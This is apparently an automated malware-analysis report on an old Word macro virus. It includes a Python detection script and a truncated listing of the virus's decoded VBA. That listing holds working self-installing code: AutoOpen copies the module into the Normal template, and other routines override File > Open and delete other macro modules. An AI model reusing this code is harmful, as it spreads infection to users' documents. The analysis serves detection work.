Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27829af7a44f6aab…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 34.0 KB
Created: 2000-07-06 23:45:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b32a3d880f9bfc0552a5a33fa810d67d
SHA-1: f0b2b4c79f4769c4d6b192275207097df989d461
SHA-256: 27829af7a44f6aabb230ba6d3ef35e2f5158a1fee51d35cf568af6d727777a3d
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1137.001 Office Application Startup: Office Template Macros (the macro installs its own module into the Normal template; nothing in the recovered code touches Run keys or the Startup folder, so T1547.001 does not apply)

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Killhack-1. It carries a VBA project whose AutoOpen subroutine copies its own module ("Kill_S129") into the Normal template with Application.OrganizerCopy if the module is not already there, the classic Word macro-virus persistence mechanism: once in Normal, the module is loaded in every later Word session. The same module overrides the built-in FileOpen command, so the File > Open dialog re-runs its Search_and_Kill routine, and it adds an "About Un2mU" button to the Help menu wired to a macro named AboutUn2mU. Search_and_Kill deletes modules belonging to other Word macro viruses (S129, Titasic, CyberHack) from the Normal template and the active document, and RepairMenu restores menu captions altered by S129 and sets Options.VirusProtection back to True; the code presents itself as an anti-virus macro ("Un2mU WM-AV") while itself installing into Normal. The only URL (http://come.to/un2mu) sits in the document text, is not referenced by the recovered macro code, and is not a detection on its own; nothing in the recovered code downloads or drops a payload, so this is a self-installing macro virus rather than a macro downloader.

Heuristics (5)

  • ClamAV: Doc.Trojan.Killhack-1 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Killhack-1
  • VBA macros detected [medium; OLE_VBA_MACROS; 1 related finding]
    Document contains VBA macro code
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    Document contains an AutoOpen subroutine, which Word runs automatically when the document is opened; here it is the routine that installs the module into the Normal template.
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself; in this sample the marker corresponds to the AutoOpen subroutine of the recovered VBA project (see Extracted artifacts) rather than to a WordBasic-only document.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://come.to/un2mu (channel: document text, OLE body)
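The indicators above can be reproduced on the macro source listed under Extracted artifacts with a small static pass. The following is an added example, not code from this report or from the scanner that produced it: it runs regex checks over plain VBA text for auto-exec entry points, built-in command overrides (a Sub named FileOpen replaces Word's File > Open), OrganizerCopy calls whose destination resolves to the Normal template (following `Set NT = NormalTemplate` aliases), VBProject enumeration, CommandBars tampering and writes to Options.VirusProtection, and labels extracted URLs with the channel that reached them. Rule ids that also appear in this report are reused; ids prefixed EXAMPLE_, the severity weights and the verdict thresholds are choices made for this example. The VBA excerpt and the document text are constructed from the listing above.

```python
import re
from dataclasses import dataclass, field

SEVERITY_WEIGHT = {"high": 3, "medium": 1, "info": 0}


def _sub_named(names):
    # Matches a Sub declaration at line start whose name is one of `names`.
    return re.compile(r"^[ \t]*(?:Public[ \t]+|Private[ \t]+)?Sub[ \t]+(" + names + r")\b", re.I | re.M)


# Entry points Word/Excel run without user interaction.
AUTO_EXEC = _sub_named("AutoOpen|AutoClose|AutoExec|AutoExit|AutoNew|Document_Open|Document_Close|Workbook_Open")
# A Sub named after a built-in Word command replaces that command for the user.
BUILTIN_HIJACK = _sub_named("FileOpen|FileSave|FileSaveAs|FileNew|FileClose|FilePrint|ToolsMacro|ToolsOptions|ViewVBCode")
NORMAL_ALIAS = re.compile(r"^[ \t]*Set[ \t]+(\w+)[ \t]*=[ \t]*NormalTemplate\b", re.I | re.M)
ORGANIZER_COPY = re.compile(r"OrganizerCopy\b([^\n]*)", re.I)
DESTINATION = re.compile(r"Destination[ \t]*:=[ \t]*(\w+)", re.I)
VBPROJECT = re.compile(r"\bVBProject\.VBComponents\b", re.I)
COMMANDBARS = re.compile(r"\bCommandBars[ \t]*\(", re.I)
VIRUS_PROTECTION = re.compile(r"\bOptions\.VirusProtection[ \t]*=", re.I)
URL = re.compile(r"https?://[^\s\"'<>()]+", re.I)


@dataclass
class Finding:
    rule: str       # report rule ids are reused; EXAMPLE_* ids are invented here
    severity: str
    evidence: str


@dataclass
class Triage:
    findings: list = field(default_factory=list)
    urls: list = field(default_factory=list)  # (url, channel that reached it)

    def rules(self):
        return {f.rule for f in self.findings}

    def score(self):
        return sum(SEVERITY_WEIGHT[f.severity] for f in self.findings)

    def verdict(self):
        # Example thresholds: an auto-exec marker alone is only "suspicious";
        # together with persistence or command hijacking it becomes "malicious".
        s = self.score()
        return "malicious" if s >= 6 else "suspicious" if s >= 1 else "clean"


def triage(vba_source, body_text=""):
    t = Triage()
    for m in AUTO_EXEC.finditer(vba_source):
        t.findings.append(Finding("OLE_VBA_AUTOOPEN", "high", m.group(1)))
    for m in BUILTIN_HIJACK.finditer(vba_source):
        t.findings.append(Finding("EXAMPLE_BUILTIN_COMMAND_HIJACK", "high", m.group(1)))
    # Resolve `Set NT = NormalTemplate` so a copy to NT.FullName is recognised as a
    # copy into the Normal template (ATT&CK T1137.001, Office Template Macros).
    normal_names = {"normaltemplate"} | {m.group(1).lower() for m in NORMAL_ALIAS.finditer(vba_source)}
    for m in ORGANIZER_COPY.finditer(vba_source):
        dest = DESTINATION.search(m.group(1))
        if dest and dest.group(1).lower() in normal_names:
            t.findings.append(Finding("EXAMPLE_NORMAL_TEMPLATE_COPY", "high", m.group(0).strip()))
    if VBPROJECT.search(vba_source):          # macro inspecting or editing VBA projects
        t.findings.append(Finding("EXAMPLE_VBPROJECT_ENUMERATION", "medium", "VBProject.VBComponents"))
    if COMMANDBARS.search(vba_source):        # menu / toolbar tampering
        t.findings.append(Finding("EXAMPLE_COMMANDBAR_TAMPERING", "medium", "CommandBars(...)"))
    if VIRUS_PROTECTION.search(vba_source):   # macro writing Word's macro-security option
        t.findings.append(Finding("EXAMPLE_VIRUS_PROTECTION_WRITE", "high", "Options.VirusProtection ="))
    # URLs are labelled with the channel that reached them; a URL is never a detection.
    for src, channel in ((vba_source, "vba-macro"), (body_text, "document-text")):
        t.urls.extend((m.group(0), channel) for m in URL.finditer(src))
    return t


# Constructed excerpt of the macro listed under "Extracted artifacts" in the report.
SAMPLE_VBA = '''Sub AutoOpen()
  Set AD = ActiveDocument
  Set NT = NormalTemplate
  For Each im In NT.VBProject.VBComponents
     If im.Name = "Kill_S129" Then installed = True
  Next
  Application.OrganizerCopy Source:=AD.FullName, Destination:=NT.FullName, Name:="Kill_S129", Object:=wdOrganizerObjectProjectItems
  Set abt = CommandBars("Help").Controls.Add(Type:=msoControlButton)
End Sub
Sub FileOpen()
  Dialogs(wdDialogFileOpen).Show
End Sub
Sub RepairMenu()
  Options.VirusProtection = True
End Sub'''
# Constructed benign macro: auto-runs, but only shows a message box.
BENIGN_VBA = '''Sub AutoOpen()
  MsgBox "Welcome", vbOKOnly, "Template"
End Sub'''
BODY_TEXT = "Greetings from Un2mU, visit http://come.to/un2mu for details."  # constructed

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        t = triage(src, BODY_TEXT)
        print(f"{name}: {t.verdict()} (score {t.score()})")
        for f in t.findings:
            print(f"  [{f.severity}] {f.rule}: {f.evidence}")
        for url, channel in t.urls:
            print(f"  url {url} (channel: {channel})")
```

The point of the alias resolution is that real samples rarely write `Destination:=NormalTemplate.FullName` literally; this one goes through `NT`, and a naive string match for "NormalTemplate" next to "OrganizerCopy" would miss it. The benign document shows why an AutoOpen marker is weighted but not decisive on its own: it scores as suspicious, not malicious.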

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                                Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)   15884 bytes
SHA-256: 67f099873d99bcc50a9f728d8cdfb14160d36cee6c7034e1579b13cc29d3c28c
Detection: ClamAV: Doc.Trojan.Killhack-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Kill_S129"


Dim Infected As Boolean
Dim NT, AD As Object


Sub AutoOpen()
  Dim installed As Boolean
  Dim im As Object
  Dim abt As CommandBarButton
  Dim i
  Dim oke As Boolean
  
  
  Set AD = ActiveDocument
  Set NT = NormalTemplate
  
  installed = False
  For Each im In NT.VBProject.VBComponents
     If im.Name = "Kill_S129" Then installed = True
  Next
  If Not (installed) Then
    Application.OrganizerCopy Source:=AD.FullName, Destination:=NT.FullName, Name:="Kill_S129", Object:=wdOrganizerObjectProjectItems
  End If
  
  Search_and_Kill
  oke = False
  For Each i In CommandBars("Help").Controls
    If i.Type = msoControlButton Then If i.Caption = "About Un2mU" Then oke = True
  Next
  If Not (oke) Then
    Set abt = CommandBars("Help").Controls.Add(Type:=msoControlButton)
    abt.Caption = "About Un2mU"
    abt.OnAction = "AboutUn2mU"
    abt.Enabled = True
    abt.Visible = True
    abt.Width = 79
    abt.Height = 19
    abt.Style = msoButtonIconAndCaption
  End If
End Sub
Sub FileOpen()
  Aof
  Dialogs(wdDialogFileOpen).Show
  Search_and_Kill
  Aon
End Sub
Sub RepairMenu()
Dim IC As CommandBarControl
Dim damaged As Boolean

On Error Resume Next
damaged = False
For Each IC In CommandBars("Help").Controls
  If IC.Caption = "Assalamu'alaikum Wr. Wb....." Then damaged = True
Next
If Not (damaged) Then
  For Each IC In CommandBars("Tools").Controls
    If IC.Caption = "Makmu, Cok.....!!!!" Then damaged = True
  Next
End If
If damaged Then
    MsgBox "Repair WORD from S129-effect", vbOKOnly, "Un2mU Virii division"
    CommandBars("Help").Controls("Assalamu'alaikum Wr. Wb.....").Caption = ("About Microsoft Word")
    CommandBars("Tools").Controls("Makmu, Cok.....!!!!").Caption = ("Macro")
    CommandBars("Tools").Controls("Tempe dan Tahu Enak...!!!").Caption = ("Templates and Add-ins...")
    CommandBars("Tools").Controls("Macro").Visible = True
    CommandBars("Tools").Controls("Macro").Enabled = True
    CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = True
End If
Options.VirusProtection = True
Aon
End Sub

Sub Search_and_Kill()
  Dim im As Object
  On Error Resume Next
  Set AD = ActiveDocument
  Set NT = NormalTemplate
  For Each im In NT.VBProject.VBComponents
    If im.Name = "S129" Or im.Name = "S129Form" Then
      MsgBox "Found & Kills virus S129 at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "astia" Then
      MsgBox "Found & Kills virus Titasic at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
      MsgBox "Found & Kills virus CyberHack/Dwiganteng at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    End If
    
  Next
  For Each im In AD.VBProject.VBComponents
    If im.Name = "S129" Or im.Name = "S129Form" Then
      MsgBox "Found & Kills virus S129 at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "astia" Then
      MsgBox "Found & Kills virus Titasic at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
      MsgBox "Found & Kills virus CyberHack/Dwiganteng at " & AD.FullName, vbOKOnly, "Un2mU Virii division"
   
... (truncated)